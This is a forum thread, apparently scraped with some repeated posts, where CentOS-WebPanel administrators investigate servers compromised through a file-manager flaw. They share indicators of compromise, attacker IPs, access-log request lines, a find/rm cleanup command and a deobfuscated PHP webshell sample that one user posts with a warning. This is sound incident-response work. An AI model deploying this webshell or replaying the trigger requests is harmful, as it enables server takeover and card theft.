CentOS-WebPanel Bugs / Re: [CRITICAL] Multiple CWP Servers Infected – Arbitrary PHP Code Execution via Publ
« on: October 15, 2025, 09:12:51 PM »I mass removed them, every part of the malicious code, backup.c, licelic.c etc with rm find. Buy maybe i can find them from backups.
As far as I understand from the context of the malicious code, they are trying trick the visitors to make payment with a credit card. Because the attacker needs to be notified every time a visitor runs the code and in defauit.php there are classes about making payment.
So the attacker takes the information of the credit card provided by the visitor, and uses it on another website.
Oh i found one image file from a backup.
How did you mass remove them? Do you have a script that you could share?
You dont need a script to remove them. This will remove all of the malicious code except for index.php.
Code: [Select]
find /home/ -type f \( -name "licelic.c" -o -name "backup.c" -o -name "defauit.php" -o -name "defauIt.php" -o -name ".c" \) -exec rm -f {} \;Edit: You can remove "-f" if you need to check which file is being removed.If you have two examples of infected index.php file, i can try to make a script that will auto remove them.
9
CentOS-WebPanel Bugs / Re: [CRITICAL] Multiple CWP Servers Infected – Arbitrary PHP Code Execution via Publ
« on: October 15, 2025, 06:48:20 PM »
I mass removed them, every part of the malicious code, backup.c, licelic.c etc with rm find. Buy maybe i can find them from backups.
As far as I understand from the context of the malicious code, they are trying trick the visitors to make payment with a credit card. Because the attacker needs to be notified every time a visitor runs the code and in defauit.php there are classes about making payment.
So the attacker takes the information of the credit card provided by the visitor, and uses it on another website.
Oh i found one image file from a backup.
As far as I understand from the context of the malicious code, they are trying trick the visitors to make payment with a credit card. Because the attacker needs to be notified every time a visitor runs the code and in defauit.php there are classes about making payment.
So the attacker takes the information of the credit card provided by the visitor, and uses it on another website.
Oh i found one image file from a backup.
10
CentOS-WebPanel Bugs / Re: [CRITICAL] Multiple CWP Servers Infected – Arbitrary PHP Code Execution via Publ
« on: October 14, 2025, 04:04:47 PM »I found some .c files.
I also found that there a lot of files called index.php, wp-login.php and files just called "c" (without the dot) across my websites. These files were deeply inside some folders of websites I've developed myself. Thankfully I have a clean backup and these files were not there.
licelic.c
I've decoded a "licelic.c" file and it had listed a lot of the infected websites locations encoded in base64 and some weird stuff (can't decode it directly, maybe it is written with another encode type). I copy-pasted it to Cloud.ai that decode it for me and it gave me all the urls that are infected. I tried chatgpt and it gave me nothing in return.
SO "licelic.c" is of extreme importance for you to deobfuscate and evaluate the URLs that are there. This file exposes the folders that were exploited.
Some of its contents:
Non wordpress website:
[my public url]/folder/folder/folder/index.php?MeL=1#####post_1
[my public url]/folder/folder/folder/index.php?MeL=1#####post_2
[my public url]/folder/folder/folder/index.php?MeL=1#####post_3
[my public url]/folder/folder/folder/index.php?MeL=1#####post_4
[my public url]/folder/folder/folder/index.php?MeL=1#####post_5
[my public url]/folder/folder/folder/index.php?MeL=1#####post_6
[my public url]/folder/folder/folder/index.php?MeL=1#####post_7
[my public url]/folder/folder/folder/index.php?MeL=1#####post_8
...
wordpress website:
[my public url]/folder/folder/folder/index.php/wp-login.php?Ny6u=2&adj=shop.php#saverun
[my public url]/folder/folder/folder/index.php/index.php?Ny6u=2&adj=shop.php#saverun
[my public url]/folder/folder/folder/index.php/index.php?Ny6u=2&adj=shop.php#saverun
[my public url]/folder/folder/folder/index.php/index.php?Ny6u=2&adj=shop.php#saverun
"c" file (without the dot)
"c" file (without the dot) is a zip content. You can add ".zip" to this file to open it with a zip application. Inside you get a new file that has a file called "s" that contains obfuscated php code that consists on drawing a form that probably interacts with the expoits. Maybe this is an exploit panel.
I leave the code here
(DO NOT EXECUTE THIS!!!!)Code: [Select]<?php
// WARNING: This is MALICIOUS code - DO NOT EXECUTE
// Checks if GET parameter "DEQ" exists
if(!isset($_GET["DEQ"])) exit;
// Function that decodes strings using indices
function Za64HUq_($TYCMzwTO, $x6Mpbe) {
$iGRCOPT = str_split($TYCMzwTO, 1);
$emivt51O = explode(",", $x6Mpbe);
$gMRtx3VD = "";
foreach($emivt51O as $v) {
$gMRtx3VD .= $iGRCOPT[(int)$v];
}
return $gMRtx3VD;
}
// Static class with method to initialize arrays
class hCXKOZB {
public static function __callStatic($name, $arguments) {
$temarr = array(
"puTfPFm" => array("3eolcnOp5Qf4_GqphVna1eerd2", "10,2,7,1,5"),
"CULPcX" => array("eheriQctavFofpceulrwEpy_J5rG", "12,19,3,4,7,0"),
"mWHO_PtG" => array("arsWrD_pcldbIoeelvh8uae4fc_K", "24,8,9,13,2,14")
);
foreach($temarr as $key => $v) {
$GLOBALS[$key] = Za64HUq_($v[0], $v[1]);
}
}
}
// Gets values from POST (if they exist)
$vA8r0 = isset($_POST["WOjVxhQ_"]) ? trim($_POST["WOjVxhQ_"]) : "";
$oTlM_Lm47 = isset($_POST["ZXk7oVxn"]) ? trim($_POST["ZXk7oVxn"]) : "";
// Decodes the input
$n3Bi8fy = !empty($oTlM_Lm47) ? $puTfPFm($vA8r0, "w") : "";
// If there is a decoded result, writes error message and exits
if($n3Bi8fy) exit("pIUeNv1Ox74Cq0i" . $mWHO_PtG($n3Bi8fy));
// Displays HTML form with hidden fields
echo "<form method=\"POST\">";
echo "<div><input type=\"text\" name=\"WOjVxhQ_\"></div>";
echo "<div><textarea name=\"ZXk7oVxn\" rows=\"5\"></textarea></div>";
echo "<button type=\"submit\">submit</button>";
echo "</form>";
?>
index.php
This is the index.php deeply inside subfolders were the index file i've created. The root index.php file was replaced by a malicious code that executes the payload and imports my original index file.
So take a deep look on every index file you have (even sub-folders).
These files were touched (date-time changed). Mine dated 30/08/2024 23:06:51
So even if you change your panel or format your server, you'll be hacked again if you don't sanitize every website. This means going throw all files and folders and apply new rules to stop execution on folders that you don't have php files (image uploads for example).
Thank you for proving my point. There are also png looking files containing malicious code with random filename but they are rare. Probably result of an interrupted code with an exception.
11
CentOS-WebPanel Bugs / Re: [CRITICAL] Multiple CWP Servers Infected – Arbitrary PHP Code Execution via Publ
« on: October 13, 2025, 03:24:40 AM »Those .c files don't appear to be IoC related to the patched CWP vulnerability. Likely they are part of another PHP injection attack -- multiple competing gangs are attempting to compromise servers on any given day. So the recommendation is to harden your PHP install right away, then engage in clean up & full postmortem.
Better to batten down the hatches rather than bailing water out of the ship...
.c files result of the same vulnerability no doubt. Maybe no one noticed because ".c" file is always hidden in a random directory or maybe who used this vulnerability didnt drop a backdoor for your server. I switched to cPanel/WHM after removing all the backdoors.
Where did you find those files? Inside /home or anywere else?
I also have this 198.144.182.13 IP in my logs.
Also found out that he also has created wordpress accounts, this is his data:
user: wpadminerlzp
email: wpadmin@volovmart.ru
date: 2020-06-14 00:00:00 (by looking at this 00:00:00, I assume this was SQL inserted)
Those files were on the public_html folder (or the main folder of that website)
defauit.php
defauIt.php
licelic.c
This file was in the public_html folder for some occurances, but for some occurances it was in a random directory
backup.c
This file was always hidden in some random directory.
.c(yes, just .c)
And I suggest you to check every file named "index.php" because they also add an obfuscated php code. You cant miss when you see it.
And they dont have to guess CWP username to inject code btw.
12
CentOS-WebPanel Bugs / Re: [CRITICAL] Multiple CWP Servers Infected – Arbitrary PHP Code Execution via Publ
« on: October 11, 2025, 12:08:44 AM »We are not safe at all. Just today our websites affected again.
This exploit was there since 2021, We've checked all the files and found out some unused websites had defauit.php, backup.c and licelic.c files with timestamp showing 2021. And infected websites will always have robots.txt file.
I thought maybe I could fix it myself by editing filemanager but its an obfuscated file. So we decided to move our customers to another panel.
Did you search the access log? Did the attacker exploit the filemanager again?
Yes, with a "python-requests/2.31.0" signature at the end. Disabling the filemanager wouldnt cut it. Because they also drop backdoor scripts. Some of them:
defauit.php
defauIt.php
backup.c
licelic.c
.c(yes, just .c)
Also there are some .png looking files which they are actually php scripts. So this mess is really time consuming to clean.
And the funny thing is that ModSecurity actually logs those attempts and says its blocked while it is clearly not blocked.
Other examples:
-Attacker disguising as Google, sends id=1 as GET and a POST request: (198.144.182.13 - - [31/Jul/2025:17:08:34 +0300] "POST /defauit.php?id=1 HTTP/1.1" 200 227 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36")
-Attacker can run code via any php file: 162.248.79.101 - - [30/Sep/2025:06:33:32 +0300] "GET /shop.php?l=&ck=32c4dgm3KyzHGUR59ytMXK8gLaaz38t-a-o97bdyvcgg4Ljzk-d-nKZtqg-s--s-&p=&u=&no=32c4dgm3KyzHGUR59ytMXK8gLaaz38t-a-o97bdyvcgg4Ljzk-d-nKZtqg-s--s-&ac=del&path=%2Fhome%2FSENSITIVEDATA%2Fpublic_html%2Fdefauit.php HTTP/1.1" 200 6389 "https://website.com/shop.php?l=&p=&ck=ab5o9BIxWNIxAcVthNjxfAPTh-a-QRgWy3XLNzjjCF01zWEVaQ5xS8rA-s--s-&no=&did=8&tid=8" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.106 Safari/537.36"
-Another one, but sends POST only: 207.154.240.68 - - [30/Sep/2025:14:17:21 +0300] "POST /defauit.php HTTP/1.1" 200 60 "https://www.google.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36"
13
CentOS-WebPanel Bugs / Re: [CRITICAL] Multiple CWP Servers Infected – Arbitrary PHP Code Execution via Publ
« on: October 10, 2025, 03:52:46 PM »After that, anything can be changed realy. I notice some plugins changed, and theme files. Also there is a mu-plugin that is created to the redirect.
Location of those changes? Where can i find them?
The attacker have access to every file in your system. It could change anything...
I cannot provide you a "list" of what was changed in your case. Could be just the theme files, or nothing at all - some servers may still have the backdoor placed due to the exploitation of this vulnerability in CWP, but not "activated" - are there just waiting to a request that activates the malicious payload.
The WAF rules provided here can help, but don't fix the problem if your server is already affected.
The good news is that CWP already "silently patched" this vulnerability, so you should be safe from be attacked again if you use CWP.
I didn't check all the WAF rules provided here, but the request is activated with a specific query in a POST request made to the files placed in your server. If you simply access the files, they do nothing.
It should be a request like "domain.xxxx/defaiult.php?t=XXXXXXXXXX" - where XXXXXXXXXX is a specific query.
I did decode the files, and they install a webshell - thats it. What they do after that is from the attacker point of interest.
Unfortunately, if you have been affected by this, you have two options:
- Try to see the files that have been recently changed in your system. Not just the account that is affected, but ALL the system. After that, see if something was malicious changed.
- Don't consider the server safe. Try to deploy your accounts in a fresh new server - and make sure that every single website is also clean. Use something like WordFence, or more abroad, something like CPGuard to scan the accounts.
We are not safe at all. Just today our websites affected again.
This exploit was there since 2021, We've checked all the files and found out some unused websites had defauit.php, backup.c and licelic.c files with timestamp showing 2021. And infected websites will always have robots.txt file.
I thought maybe I could fix it myself by editing filemanager but its an obfuscated file. So we decided to move our customers to another panel.
Pages: [1]
